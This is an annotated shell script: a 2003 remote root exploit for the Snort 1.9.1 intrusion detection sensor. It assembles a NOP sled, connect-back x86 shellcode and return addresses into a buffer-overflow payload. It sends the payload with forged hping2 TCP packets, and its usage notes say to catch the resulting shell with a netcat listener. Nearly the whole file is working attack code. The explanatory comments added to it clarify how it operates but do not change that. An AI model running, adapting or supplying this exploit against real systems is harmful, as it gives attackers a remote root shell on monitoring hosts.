# Title : Snort <=1.9.1 Remote Root Exploit (p7snort191.sh)
# Published : 2003-04-23
# Author : truff
#!/bin/sh
##########################################################
# p7snort191.sh by truff (truff@projet7.org) #
# Snort 1.9.1 and below remote exploit #
# #
# Tested on Slackware 8.0 with Snort 1.9.1 from sources #
# #
# Usage: #
# 1/ Launch a listening netcat to listen for the shell #
# nc -p 45295 -l #
# #
# 2/ p7snort191.sh yourIP [Ret_Addr] #
# #
# Where yourIP is the IP where the netcat is listening #
# and Ret_Addr is the address (8 hexa digits) of the #
# shellcode (eg: 0819fec2) #
# #
# #
# This vulnerability was discovered by Bruce Leidl, #
# Juan Pablo Martinez Kuhn, and Alejandro David Weil #
# from Core Security Technologies during Bugweek 2003. #
# #
# Greetz to #root people and projet7 members. #
# Special thx to mycroft for helping me with shell #
# scripting stuff. #
# #
# www.projet7.org - Security Research - #
##########################################################
# Put here the path to your hping2 binary
# Put here the path to your hping2 binary
# Historical proof-of-concept (2003) for Snort 1.9.1 and earlier, per the
# title; later versions are not listed as affected.  The script builds a
# payload file and hands it to hping2 for transmission; hping2 is the only
# external tool it depends on besides expr/cut/printf.
HPING2=/usr/sbin/hping2
# You should change these params to make the snort sensor
# capture the packets.
# These four values are placed directly into the hping2 command lines below
# (IPSRC via -a, i.e. as the forged source address).  Nothing validates them.
IPSRC=192.168.22.1
IPDST=192.168.22.2
PTSRC=3339
PTDST=111
echo "p7snort191.sh by truff (truff@projet7.org)"
# Argument handling: $1 is the IP the listener runs on (required, see the
# header), $2 an optional return address as 8 hex digits.  Neither value is
# validated; $1 is later split on '.' and passed to printf as numbers, and
# $RET is sliced with cut in 2-character pieces, so malformed input produces
# a malformed payload rather than an error.
# Note: 'exit -1' is not a valid POSIX exit status; shells report it as 255.
case $# in
0)
echo "Bad number of params"
echo "Read comments in sources"
exit -1
;;
1)
# Default return address, tied to the Slackware 8.0 build named in the header.
RET=0819fec2
echo "Using default retaddr (Slackware 8.0)"
echo $RET
;;
2)
RET=$2
echo "Using custom retaddr"
echo $RET
;;
*)
echo "Bad number of params"
echo "Read comments in sources"
exit -1
;;
esac
# Nops
# The payload is assembled in a file named 'egg' in the current working
# directory.  Every write uses '>>', so a pre-existing 'egg' is appended to
# rather than replaced; the file is removed again just before the final echo.
# 512 iterations, one byte each.
i=0
while [ "$i" -lt "512" ]; do
i=$(expr "$i" + 1)
echo -n -e "x90" >> egg
done
# linux x86 shellcode by eSDee of Netric (www.netric.org)
# 131 byte - connect back shellcode (port=0xb0ef)
# The fixed bytes are emitted in groups of eight; the only variable part is
# the 4-byte IP inserted after the "x68" line below.  The port (0xb0ef =
# 45295) matches the listener port given in the header's usage notes.
echo -n -e "x31xc0x31xdbx31xc9x51xb1" >> egg
echo -n -e "x06x51xb1x01x51xb1x02x51" >> egg
echo -n -e "x89xe1xb3x01xb0x66xcdx80" >> egg
echo -n -e "x89xc2x31xc0x31xc9x51x51" >> egg
echo -n -e "x68" >> egg
# IP here
# The four dotted-quad octets of $1 are converted to single bytes via
# printf.  This is one command spanning the next four lines (the
# line-continuation markers are not visible in this copy of the listing).
echo -n -e $(printf "\x%02x" $(echo $1 | cut -d. -f1)
$(echo $1 | cut -d. -f2)
$(echo $1 | cut -d. -f3)
$(echo $1 | cut -d. -f4)) >> egg
echo -n -e "x66x68xb0" >> egg
echo -n -e "xefxb1x02x66x51x89xe7xb3" >> egg
echo -n -e "x10x53x57x52x89xe1xb3x03" >> egg
echo -n -e "xb0x66xcdx80x31xc9x39xc1" >> egg
echo -n -e "x74x06x31xc0xb0x01xcdx80" >> egg
echo -n -e "x31xc0xb0x3fx89xd3xcdx80" >> egg
echo -n -e "x31xc0xb0x3fx89xd3xb1x01" >> egg
echo -n -e "xcdx80x31xc0xb0x3fx89xd3" >> egg
echo -n -e "xb1x02xcdx80x31xc0x31xd2" >> egg
echo -n -e "x50x68x6ex2fx73x68x68x2f" >> egg
echo -n -e "x2fx62x69x89xe3x50x53x89" >> egg
echo -n -e "xe1xb0x0bxcdx80x31xc0xb0" >> egg
echo -n -e "x01xcdx80" >> egg
# 3 dummy bytes for alignment purposes
echo -n -e "x41x41x41" >> egg
# Fill the remainder of the 3840-byte buffer with the return address.
# 134 = the 131 shellcode bytes above plus the 3 alignment bytes; 512 is the
# sled length; the result is divided by 4 because each iteration writes
# 4 bytes.  var1..var4 take the hex digit pairs of $RET in reverse order, so
# the address is written byte-reversed (the shellcode comment names x86).
i=0
cpt=$(expr 3840 - 134 - 512)
cpt=$(expr $cpt / 4)
var1=0x$(echo $RET | cut -b7,8)
var2=0x$(echo $RET | cut -b5,6)
var3=0x$(echo $RET | cut -b3,4)
var4=0x$(echo $RET | cut -b1,2)
while [ "$i" -lt "$cpt" ]; do
i=$(expr "$i" + 1)
echo -n -e $(printf "\x%02x" $var1 $var2 $var3 $var4) >> egg
done
# hping ruleZ
# Three crafted TCP segments, each command spanning three lines here.  The
# first two are forged from IPSRC:PTSRC to IPDST:PTDST with hard-coded
# sequence/ack numbers (the second carries the 'egg' file as data, -E egg,
# with -d 0xF00 = 3840 bytes); the third goes in the reverse direction with
# the seq/ack constants swapped.  All hping2 output and errors are discarded,
# so a failing hping2 (missing binary, insufficient privilege) is never
# reported and the closing "Exploit Sended" message prints regardless.
$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1
-d 0x1 --setseq 0xffff0023 --setack 0xc0c4c014
1>/dev/null 2>/dev/null
$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1
-d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014
1>/dev/null 2>/dev/null
$HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --ack -c 1
-d 0 --setseq 0xc0c4c014 --setack 0xffffffff
1>/dev/null 2>/dev/null
# Cleanup of the payload file built above.
rm egg
echo "Exploit Sended"